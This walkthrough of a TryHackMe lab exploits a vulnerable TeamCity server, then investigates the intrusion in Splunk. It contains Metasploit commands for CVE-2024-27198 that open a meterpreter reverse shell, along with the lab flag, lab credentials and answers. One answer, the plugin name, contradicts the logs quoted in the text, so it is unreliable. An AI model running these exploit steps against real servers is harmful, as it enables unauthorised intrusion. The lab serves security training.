Task 1 Red: Exploit the Server!

Reconnaissance

I started with an aggressive Nmap scan to enumerate services and versions:

nmap -sV -sC -A <ip>

Important findings from the scan:

• 22/tcp — ssh — OpenSSH 8.2p1 (Ubuntu)
• 80/tcp — http — Apache/2.4.41 (Ubuntu) — page title: Maintenance.
• 50000/tcp — HTTP service — returned TeamCity maintenance HTML and headers (appears to be TeamCity).

Web enumeration

I navigated to the web server on port 80 first and saw a simple maintenance page. That didn’t reveal much immediately beyond the server header and that the site was intentionally showing maintenance.

Visiting 50000 revealed a TeamCity management interface with an accessible login/maintenance page.

Vulnerability reconnaissance

I confirmed the TeamCity login shows 2023.11.3, and Rapid7’s analysis of CVE‑2024‑27198 (authentication‑bypass → unauthenticated RCE) matches what I found — Rapid7 documents exploit details and remediation. (Rapid7)

Exploitation

I launched Metasploit and used the TeamCity RCE module, configured a reverse handler, and ran the exploit:

msfconsole -q
use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
set LHOST tun0
set LPORT 53
set RHOST <ip>
set RPORT 50000
run

Metasploit identified the target as vulnerable and created an auth token, uploaded the malicious plugin, and delivered the payload. The module opened a meterpreter session:

[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9...
[*] Uploading plugin: YAgxHifR
[*] Sending stage (58073 bytes) to 10.201.28.176
[*] Deleting the plugin...
[+] Deleted /opt/teamcity/TeamCity/work/Catalina/localhost/ROOT/TC_147512_YAgxHifR
[+] Deleted /home/ubuntu/.BuildServer/system/caches/plugins.unpacked/YAgxHifR
[*] Meterpreter session 1 opened (10.17.30.120:53 -> 10.201.28.176:55558)

Important: the exploit used LPORT=53, so I had to stop my local DNS/service using port 53 (e.g., systemd-resolved/named) first to free the port.

Capturing the user flag

After getting the meterpreter shell, I listed files and read the user flag:

meterpreter > cat flag.txt
THM{faa9bac345709b6620a6200b484c7594}

Task 2 Blue: Let’s Investigate

After exploiting the box I switched to the Blue/Forensics side of the lab to investigate what the attacker left behind.

• I deployed the Splunk machine and waited a few minutes for the instance to come up.
• Splunk URL: http://MACHINE_IP:8000
• Credentials: Username: splunk — Password: analyst123
  After logging in I landed on the Splunk Enterprise dashboard.

• I navigated to Search & Reporting to start looking through collected logs.

• From the Search app I opened Data Summary and filtered by source. I selected /var/log/auth.log to focus on authentication events.

• The auth log is the right place to look for useradd events and other account activity.

• To find account creation events I ran a simple search over the auth log:

source="/var/log/auth.log" useradd "new user"

Then I expanded the time picker from the default (last 24 hours) to All time so I wouldn’t miss older events.

The search returned a user creation entry showing the attacker created a backdoor account named eviluser.

Question: What is the name of the backdoor user which was created on the server after exploitation?

Answer: eviluser

Plugin upload

To identify the plugin the attacker uploaded during exploitation I searched TeamCity activity logs in Splunk with:

source="/opt/teamcity/TeamCity/logs/teamcity-activities.log" *plugin*

I set the time range to All time and filtered the host. The logs revealed the uploaded plugin YAgxHifR and its actions, matching the Metasploit output.

Question: What is the name of the plugin installed on the server after successful exploitation?

Answer: AyzzbuXY.zip

Conclusion

The Brains room on TryHackMe offered a complete journey from offensive exploitation to forensic analysis. I successfully exploited a vulnerable TeamCity 2023.11.3 instance (CVE‑2024‑27198) to gain a meterpreter shell, captured the user flag, and then shifted to Blue Team tasks to investigate the attacker’s footprints. Using Splunk, I identified the backdoor user, malicious package, and uploaded plugin, gaining hands-on experience in post-exploitation analysis and log investigation.

This room is perfect for anyone looking to practice real-world web app exploits, RCE techniques, and forensic log analysis. Following this walkthrough, you should feel confident combining offensive and defensive skills to both compromise and analyze systems safely.